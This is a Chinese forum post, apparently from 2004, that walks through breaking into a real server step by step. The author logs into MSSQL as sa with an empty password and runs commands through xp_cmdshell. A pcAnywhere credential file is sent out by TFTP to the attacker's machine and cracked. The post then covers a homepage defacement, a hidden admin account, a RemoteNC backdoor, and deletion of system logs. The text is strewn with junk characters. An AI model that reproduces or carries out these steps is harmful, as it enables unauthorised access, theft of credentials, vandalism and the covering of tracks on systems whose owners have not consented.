|
先ping出目标主机的IP地址:
9 k% `- G3 S6 ^7 b5 |连接IP主机: 211.154.xxx.xx... + v0 h9 O1 Q! ?3 ~
发送 56 个字节...
4 O8 g. I- r; c! g3 `接收到 56 个字节! 历时: 0毫秒 & j' z. W8 J# m8 Z. ]$ B
结论: IP主机正在与Internet连接中... - \" A4 {0 U8 Z, e/ m
接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理): 7 l4 M5 B0 R! q; V
主机信息 : V; Q% F" ~1 M8 Z5 [
主机名:BEWDB01NOK 6 l8 l& ^" ^1 A& X
80(HTTP)
6 p2 m6 L5 v( |; `6 x5 R& O21(FTP Control) ' ]& P, ~9 ?) V$ o% N' i
25(SMTP) 4 A" v; E- x; R
443(HTTPS)
& h. L! F' R% e' i1433(MSSQL) . @' P y8 @- v9 @' ?' F" U
5631(PCAnyWhere)
) Z8 [( n' j/ m; ?" s用户列表 0 i$ Y% X4 y+ _
Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin) ; Z f1 [) f9 }. G/ Q8 y
漏洞: 7 b/ M. B0 i- X$ e0 e
/\../readme.txt (HTTP: 200 )
% w$ Y5 J; k6 {; Y$ M6 O, a/msadc/msadcs.dll (HTTP: 200 )
- Y8 j) c& w! c% l! G7 L/iisadmpwd/achg.htr (HTTP: 200 ) ) o2 z) Q; T' z: P! _& r
/_AuthChangeUrl (HTTP: 200 ) 4 I4 S& R8 x- ^% u6 m$ _# u7 i
/?PageServices (HTTP: 200 )
9 R4 W& T& Y: h, t9 C2 I 上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看, 6 E8 ^4 p1 M' n. ]/ m# N+ \
21(FTP Control) 3 P- q+ F( U7 ~8 a: X* W3 z1 l" o3 ~# E( ~
1433(MSSQL)
) X" j4 z( T* J7 V& y9 m5631(PCAnyWhere) 8 [ m( E' z3 G/ ?8 z1 J
只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从
2 Z$ F) U6 c5 M9 B7 R1433,5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户端,在Host框中输入目标ip:211.154.xxx.xx # |6 x I; ?& Z6 T
Username为sa
9 `( P- F) c- ]3 m7 z8 s( ypassword框空,连接:
! X" S& a# o n; g8 sSQL>Connecting 211.154.xxx.xx ) \9 N3 Q; M9 |2 b/ d
SQL>Connected to 211.154.xxx.xx
& m: B1 w5 S; i 呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以xp_cmdshell " "的形式运行任意dos指令了!dir一下试试看: 6 ~: O1 M) J* ?! ^; T$ z& _ k
SQL>Command: xp_cmdshell "dir c:\" & k$ S. V$ m8 X7 Q8 V& V
驱动器 C 中的卷没有卷标。 & \1 @, a- j& w) v% t# n
卷的序列号是 5CBD-664C ; M# M# R5 G$ F- L0 t' K1 Z4 R+ `
卷的序列号是 5CBD-664C $ a) D0 |- I7 C, p3 B+ S
c:\ 的目录 " o, R& W/ E l/ J( u# b( M6 z5 Z
c:\ 的目录 C$ p$ k! h8 F! F2 m4 q, q. t% \. Y
01-12-20 08:13p <DIR> 2u2u 2 u9 q4 y! C6 C# O
01-07-23 08:10p 0 AUTOEXEC.BAT $ g h# ?* t# A) w/ i/ _
01-11-28 04:02p 84 biaoti.txt * y; g' q# E! K7 Z0 O2 M4 f0 a) v
01-07-23 08:10p 0 CONFIG.SYS / }+ a! k- W2 {7 P4 k' b
01-11-22 11:49a <DIR> InetPub 9 Y; `5 w- q3 Z! U8 i8 y2 V
01-10-25 11:12a 15,360 kkkk.XLS
* V3 K& S0 ~2 K# x0 e7 v01-07-24 12:09p <DIR> MSSQL7
( d8 i: j K, J7 R01-12-12 11:00a 134,217,728 pagefile.sys
4 _2 t; _, T# _01-11-30 10:59a <DIR> Program Files
1 [) c/ ?7 y! C3 H" M01-09-04 02:43p 136 sp_attach.sql
6 z' ^+ d% ]) T& O9 @01-12-20 04:12p <DIR> temp
% |, e: h/ p( \& D01-09-27 11:14a <DIR> unzipped
+ T" r5 \7 @$ c! t p9 m* k- M01-12-15 12:09a <DIR> WINNT
7 D, [! l( n, g- g13 个文件 134,233,308 字节
, h4 l3 i+ }# V7 y54,232,576 字节可用 * H. W9 z& l6 _" G, d2 b$ h" Z
54,232,576 字节可用 1 O" G3 R6 p: A a3 F) i
这时我们便可以改对方的主页了!前提是先找到对方的web目录!来找找看
5 y. |: p V2 @; D0 h! F; K………… ( T! F2 |3 Y; |5 z+ z
XX分钟后,满头大汉,乖乖!竟然有X个盘,每个盘下又有XX个目录,这样找下去得何年何月?不成!要是有windows界面的形式就好找的多了!想想看,目标主机还开着5631端口,这正是pcanywhere远程管理端口呀!取了它的管理帐号和密码不就得了吗?不错的想法,呵呵……
: `2 r$ y0 R) h3 J/ m' _# u默认情况下,pcanywhere安装于c:\Program Files目录下,其data目录下的.cif文件中保存着加密过的连接帐号和密码。只要得到此文件,就可以用一个叫pcanywherepwd的软件快速解出密码!
2 _- o, D) g, p; }0 T6 {' s- X且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务:
1 G: Y& q: O: R4 f$ z5 d2 d选择“工具”菜单中的tftp服务器。设置一个默认根目录,点启动即可! ( ~/ C" z, g c: G4 K: W& s/ B
然后再用ms-sql客户端在目标服务器执行如下指令: 0 g/ \" t1 k6 @5 r5 T# n
copy c:\progra~1\pcanywhere\data\New Caller.CIF c:\winnt\system32 ( X5 l8 ~) o' k# P' h! h
tftp -i 本地ip put New Caller.CIF ( J, R* d+ F& i7 }3 w
命令执行成功,这个cif文件已被传到本地tftp目录下了! 4 [7 h3 e/ ?8 ]' E: ]* T
此时,用pcanywherepwd.exe破解此文件,得到用户名为:administrator
& I7 e( K: E, k) w密码为:amsrepair 0 T& ]. H5 \0 a& r) J
打开pcanywhere manager建立一个指向211.154.xxx.xx的通道。在setting项中选择network host pc to control or ip adress, 并添上目标ip:211.154.xxx.xx 7 @/ j4 v: C( k- A: }+ I
选中login information项中的automatically login to host up connection " \- C* j) D' T) u
并在下面的login name和password栏中添入刚才得到的用户名和密码!确定即可。双击新建立的通道,稍等片刻即可看到了对方桌面。这下好搞了,呵呵~~在
6 S! N% k( C1 g" }/ T9 |g:\home\wwweb\目录下,终于找到了他们的index.htm。删!再手动定一个简单的文件:
: k/ d1 Z7 t( ~+ m* |; x<html>
0 D: T, U8 P5 b<head> 4 i) |7 M0 t8 `) c) `9 S4 k
<title>hacked<title>
0 z, P& T9 b' G: z</head>
& i, q; N1 v' V4 D% |<body> ! }6 @/ Y8 t6 m# O: ?2 |7 c
<center>
5 e+ ~% _5 W# F1 @& h5 chacked
8 x9 P/ |3 p1 \8 q! T</center>
5 P1 M a- N* y' ~+ Q8 X</body>
, h4 ^% S% B% |3 R& R! Y6 O保存为:index.htm 9 a8 L- {- |0 Q" y, m- @9 L
修改主页完成。 " W t0 i2 [4 x" ]! I" D
1 _1 z+ Y9 I/ `. u
该留个后门了,这是个NT主机,用小榕的RemoteNC做后门最好不过了!
, l) I6 V, S5 F3 H先给系统加个超级用户,用ms-sql来做:
2 ^& a: q9 ~) f- o0 anet user wing wing /add
% z' g! |: u+ Inet localgroup administrators wing /add
, ^' F2 Y5 _+ ?9 A2 y/ P3 o从对方桌面上打开ie连到小榕的站上下载RemoteNC,然后进入命令提示行状态,键入:
6 q9 ^+ B# l yRemoteNC 211.154.xxx.xx wing wing LocalSystem "RemoteNC" "Provide Local CMD Redirect" 7 123456
& o$ J l% E( s" A系统显示: 6 k- i+ q0 }2 R3 D, j6 n: W: u G
[Install Service as RunasUser Mode]
- A' r# A6 }# \, A0 P. [; C7 cConnecting 211.154.xxx.xx ..... Done. + _& b4 Z& `0 Z0 l
Transffer File ..... Done. , I( V- r& m3 L+ @: ~
Start Service ..... Done.
4 M* L9 D( q8 ^# Y+ K* O3 M( u" A% ^$ Q: e% {9 B8 [
Now You can 211.154.xxx.xx to Connect, Have a Joy 安装成功
& _ }9 L: A! @" |, P这样在任何时候都可以telnet 211.154.xxx.xx 7输入密码:123456即可使用系统任何资源了!
/ F4 c5 @$ `2 S# ^$ z接下来该清理战场了,在ms-sql下停掉对方的ftp和www服务:
( e( U! Z% [; N- z( a/ |, T: lnet stop msftpsvc - s: u5 P7 ^5 h
net stop w3svc 3 t) Q+ }% A6 D* P3 K$ }
删除c:\winnt\sys tem32\logfile下的所有文件。 , ?! V# `1 d$ m+ Q! w F& V5 N k
再将服务恢复:
8 ]- _% h" L, @( o. enet start msftpsvc
, J3 R# a6 B, K% U* \0 Rnet start w3svc | 
IP卡
狗仔卡
发表于 2004-10-6 02:15
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
